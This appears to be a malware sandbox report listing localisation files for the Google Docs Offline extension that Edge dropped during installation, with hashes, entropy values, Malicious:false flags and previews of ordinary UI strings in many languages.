                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                        Malicious:false
